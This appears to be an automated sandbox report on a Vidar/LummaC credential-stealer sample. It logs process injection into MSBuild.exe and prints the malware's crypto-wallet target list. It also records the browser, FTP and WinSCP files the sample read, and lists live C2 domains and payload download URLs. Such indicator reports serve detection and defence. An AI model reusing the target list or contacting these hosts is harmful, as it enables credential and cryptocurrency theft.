Source: MSBuild.exe, 00000001.00000002.2226316788.00000000004E4000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: *|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: MSBuild.exe, 00000001.00000002.2226316788.00000000004E4000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: keystore
Source: MSBuild.exe, 00000001.00000002.2226316788.00000000004E4000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: *|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Exodus\backups\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000001.00000002.2226316788.0000000000503000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2227078403.0000000001216000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 7300, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected LummaC Stealer
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: 9.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.AAFIIJDAAA.exe.1b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.2228944869.00000000001DD000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2216121534.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Yara detected Vidar
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 0.2.T2bmenoX1o.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.T2bmenoX1o.exe.dddad8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.T2bmenoX1o.exe.dddad8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.2226316788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1811230468.0000000000DDD000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: T2bmenoX1o.exe PID: 7284, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 7300, type: MEMORYSTR
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CD40C40 sqlite3_bind_zeroblob, 1_2_6CD40C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CD40D60 sqlite3_bind_parameter_name, 1_2_6CD40D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CC68EA0 sqlite3_clear_bindings, 1_2_6CC68EA0
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1528576 Sample: T2bmenoX1o.exe Startdate: 08/10/2024 Architecture: WINDOWS Score: 100 46 wickedneatr.sbs 2->46 48 t.me 2->48 50 13 other IPs or domains 2->50 60 Multi AV Scanner detection for domain / URL 2->60 62 Suricata IDS alerts for network traffic 2->62 64 Found malware configuration 2->64 66 18 other signatures 2->66 9 T2bmenoX1o.exe 1 2->9         started        signatures3 process4 signatures5 76 Writes to foreign memory regions 9->76 78 Allocates memory in foreign processes 9->78 80 Injects a PE file into a foreign processes 9->80 12 MSBuild.exe 1 144 9->12         started        17 WerFault.exe 21 16 9->17         started        process6 dnsIp7 54 kasm.zubairgul.com 95.164.90.97, 51293, 80 VAKPoltavaUkraineUA Gibraltar 12->54 56 t.me 149.154.167.99, 443, 49742 TELEGRAMRU United Kingdom 12->56 58 2 other IPs or domains 12->58 36 C:\Users\user\AppData\Local\...\sql[1].dll, PE32 12->36 dropped 38 C:\Users\user\AppData\...\softokn3[1].dll, PE32 12->38 dropped 40 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 12->40 dropped 44 12 other files (8 malicious) 12->44 dropped 82 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 12->82 84 Found many strings related to Crypto-Wallets (likely being stolen) 12->84 86 Contains functionality to inject code into remote processes 12->86 88 6 other signatures 12->88 19 AAFIIJDAAA.exe 1 12->19         started        22 cmd.exe 1 12->22         started        42 C:\ProgramData\Microsoft\...\Report.wer, Unicode 17->42 dropped file8 signatures9 process10 signatures11 68 Antivirus detection for dropped file 19->68 70 Machine Learning detection for dropped file 19->70 72 Writes to foreign memory regions 19->72 74 2 other signatures 19->74 24 MSBuild.exe 19->24         started        27 WerFault.exe 20 16 19->27         started        30 conhost.exe 22->30         started        32 timeout.exe 1 22->32         started        process12 dnsIp13 52 steamcommunity.com 104.102.49.254, 443, 51295 AKAMAI-ASUS United States 24->52 34 C:\ProgramData\Microsoft\...\Report.wer, Unicode 27->34 dropped file14
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
104.102.49.254
 steamcommunity.com United States
16625 AKAMAI-ASUS true
95.164.90.97
 kasm.zubairgul.com Gibraltar
39762 VAKPoltavaUkraineUA true
147.45.44.104
 nsdm.cumpar-auto-orice-tip.ro Russian Federation
2895 FREE-NET-ASFREEnetEU false
149.154.167.99
 t.me United Kingdom
62041 TELEGRAMRU true
45.132.206.251
 cowod.hopto.org Russian Federation
59731 LIFELINK-ASRU true

Contacted Domains

Name IP Active
bg.microsoft.map.fastly.net 199.232.210.172 true
steamcommunity.com 104.102.49.254 true
cowod.hopto.org 45.132.206.251 true
nsdm.cumpar-auto-orice-tip.ro 147.45.44.104 true
t.me 149.154.167.99 true
s-part-0017.t-0009.t-msedge.net 13.107.246.45 true
fp2e7a.wpc.phicdn.net 192.229.221.95 true
kasm.zubairgul.com 95.164.90.97 true
frizzettei.sbs unknown unknown
bemuzzeki.sbs unknown unknown
invinjurhey.sbs unknown unknown
exilepolsiy.sbs unknown unknown
exemplarou.sbs unknown unknown
laddyirekyi.sbs unknown unknown
wickedneatr.sbs unknown unknown
isoplethui.sbs unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
frizzettei.sbs true unknown
http://nsdm.cumpar-auto-orice-tip.ro/ldms/a43486128347.exe false unknown
http://kasm.zubairgul.com/vcruntime140.dll true
    		unknown
    http://kasm.zubairgul.com/softokn3.dll true
      		unknown
      https://steamcommunity.com/profiles/76561199724331900 true
      • URL Reputation: malware
      		 unknown
      invinjurhey.sbs true unknown
      exilepolsiy.sbs true unknown
      bemuzzeki.sbs true unknown
      http://kasm.zubairgul.com/msvcp140.dll true
        		unknown
        exemplarou.sbs true unknown
        http://kasm.zubairgul.com/mozglue.dll true
          		unknown
          wickedneatr.sbs true unknown
          http://kasm.zubairgul.com/freebl3.dll true
            		unknown
            laddyirekyi.sbs true
              		unknown
              http://kasm.zubairgul.com/nss3.dll true
                		unknown
                isoplethui.sbs true
                  		unknown
                  http://kasm.zubairgul.com/ true
                    		unknown
                    http://kasm.zubairgul.com/sql.dll true
                      		unknown
                      http://cowod.hopto.org/ true
                        		unknown
                        https://t.me/maslengdsa true
                          		unknown
                          https://steamcommunity.com/profiles/76561199786602107 true
                            		unknown